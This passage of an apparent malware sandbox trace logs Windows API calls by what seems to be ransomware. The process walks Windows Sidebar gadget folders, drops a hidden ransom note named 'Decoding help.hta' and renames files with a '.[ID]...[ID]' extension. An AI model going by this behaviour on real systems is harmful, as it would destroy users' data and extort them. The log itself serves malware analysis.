ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3f2, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0054.693] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0054.693] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0054.694] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" [0054.694] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0054.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f4 [0056.935] WriteFile (in: hFile=0x6f4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x28d9fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x28d9fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.465] CloseHandle (hObject=0x6f4) returned 1 [0058.465] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.465] lstrcmpiW (lpString1="Decoding help.hta", lpString2="gadget.xml") returned -1 [0058.465] lstrlenW (lpString="gadget.xml") returned 10 [0058.465] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.465] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" [0058.465] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" [0058.465] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.465] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea8d4f6, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a844fb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea8d4f6, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="js", cAlternateFileName="")) returned 1 [0058.465] lstrcmpW (lpString1=".", lpString2="js") returned -1 [0058.465] lstrcmpW (lpString1="..", lpString2="js") returned -1 [0058.465] lstrcmpiW (lpString1="windows", lpString2="js") returned 1 [0058.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.466] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="js" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js" [0058.466] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\*.*" [0058.466] GlobalMemoryStatus (in: lpBuffer=0x28d9fd10 | out: lpBuffer=0x28d9fd10) [0058.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2525fd70, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f4 [0058.467] CloseHandle (hObject=0x6f4) returned 1 [0058.467] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xd6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="picturePuzzle.html", cAlternateFileName="")) returned 1 [0058.467] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.467] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" [0058.467] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.467] lstrcmpiW (lpString1="Decoding help.hta", lpString2="picturePuzzle.html") returned -1 [0058.467] lstrlenW (lpString="picturePuzzle.html") returned 18 [0058.467] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.467] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.467] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="picturePuzzle.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" [0058.467] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" [0058.467] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.467] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.468] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x156a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 1 [0058.468] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" [0058.468] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\decoding help.hta")) returned 0x1 [0058.468] lstrcmpiW (lpString1="Decoding help.hta", lpString2="settings.html") returned -1 [0058.468] lstrlenW (lpString="settings.html") returned 13 [0058.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*" [0058.468] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\*.*") returned 81 [0058.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\", lpString2="settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" [0058.468] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" [0058.468] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.468] FindNextFileW (in: hFindFile=0x671270, lpFindFileData=0x28d9fd30 | out: lpFindFileData=0x28d9fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x156a, dwReserved0=0x0, dwReserved1=0x0, cFileName="settings.html", cAlternateFileName="")) returned 0 [0058.469] FindClose (in: hFindFile=0x671270 | out: hFindFile=0x671270) returned 1 Thread: id = 861 os_tid = 0xaf0 [0054.691] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*", lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a58b0 [0056.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.147] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.148] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.148] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.148] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x104c, dwReserved0=0x0, dwReserved1=0x0, cFileName="clock.html", cAlternateFileName="")) returned 1 [0056.601] lstrcpyW (in: lpString1=0x2aa80f18, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0056.601] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0056.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" [0056.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0056.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.246] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x28edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x28edfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.247] CloseHandle (hObject=0x354) returned 1 [0058.247] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.247] lstrcmpiW (lpString1="Decoding help.hta", lpString2="clock.html") returned 1 [0058.247] lstrlenW (lpString="clock.html") returned 10 [0058.247] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.247] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.247] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="clock.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" [0058.247] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" [0058.247] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]" [0058.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\clock.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\en-us\\clock.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.247] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea6723d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22aaa7b4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea6723d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0058.247] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0058.247] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0058.247] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0058.248] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*" [0058.248] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\*.*") returned 73 [0058.248] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css" [0058.248] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\en-US\\css\\*.*" [0058.248] GlobalMemoryStatus (in: lpBuffer=0x28edfd10 | out: lpBuffer=0x28edfd10) [0058.248] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11639808, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x354 [0058.249] CloseHandle (hObject=0x354) returned 1 [0058.249] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0x28edfd30 | out: lpFindFileData=0x28edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118ea0e8, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x118ea0e8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 [0058.249] lstrcpyW (in: lpString1=0x2aa50e98, lpString2="\\\\?\\C:\\Program Files 